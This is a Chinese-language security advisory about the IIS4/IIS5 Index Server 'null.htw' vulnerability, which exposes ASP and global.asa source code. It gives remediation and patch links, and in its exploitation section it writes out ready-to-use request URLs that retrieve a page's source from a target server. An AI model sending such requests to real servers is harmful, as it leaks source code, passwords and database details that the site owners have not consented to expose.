top
Loading...
ASP又出新漏洞(有辦法看源代碼了)
IIS4/II5 ASP等文件暴露源代碼重大漏洞

受影響的系統:Microsoft IIS4.0 Microsoft II5.0
不受影響的版本: 未知
遠程: YES / 本地:UnKnown
內容摘要:
Cerberus安全組織發現了微軟Index Server的第三個可以察看asp源代碼和其它頁面的漏洞。包括運行IIS4或者IIS5的Index Server,甚至以及添打了最近關于參看源代碼的補丁程序的系統,或者沒有.htw文件的系統,一樣存在該問題。獲得asp程序,甚至global.asa文件的源代碼,無疑對系統是一個非常重大的安全隱患。往往這些代碼中包含了用戶密碼和ID,以及數據庫的源路徑和名稱等等。這對于攻擊者收集系統信息,方面下一步的入侵都是非常重要的。
漏洞的利用:
由于'null.htw'文件并非真正的系統映射文件,所以只是一個儲存在系統內存中的虛擬文件。哪怕你已經從你的系統中刪除了所有的真實的.htw文件,但是由于對null.htw文件的請求默認是由webhits.dll來處理。所以,IIS仍然收到該漏洞的威脅。
發送一個這樣的請求:
http://www.victim.com/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
將獲得Web根目錄下的default.asp的源代碼。
例子:
/default.asp是以web的根開始計算。如某站點的http://www.victim.com/welcome/welcome.asp
那么對應就是:
http://www.victim.com/null.htw?CiWebHitsFile=/welcome/welcome.asp%20&CiRestriction=none&CiHiliteType=Full

解決方案:
如果該webhits提供的功能是系統必須的,請下載相應的補丁程序。
如果沒必要,請用IIS的MMC管理工具簡單移除.htw的映象文件。
微軟已經對該問題發放了補丁:
Index Server 2.0:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17727
Alpha: http://www.microsoft.com/downloads/release.asp?ReleaseID=17728
Windows 2000 Indexing Services:
Intel: http://www.microsoft.com/downloads/release.asp?ReleaseID=17726
相關鏈接:
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
http://soft.xxinfo.ha.cn/mudfrog/Vulnerbilities/Data/aspinc.htm
http://soft.xxinfo.ha.cn/mudfrog/Vulnerbilities/Data/aspsucurityone.htm
http://soft.xxinfo.ha.cn/mudfrog/txt/see-asp.htm

作者:http://www.zhujiangroad.com
來源:http://www.zhujiangroad.com
北斗有巢氏 有巢氏北斗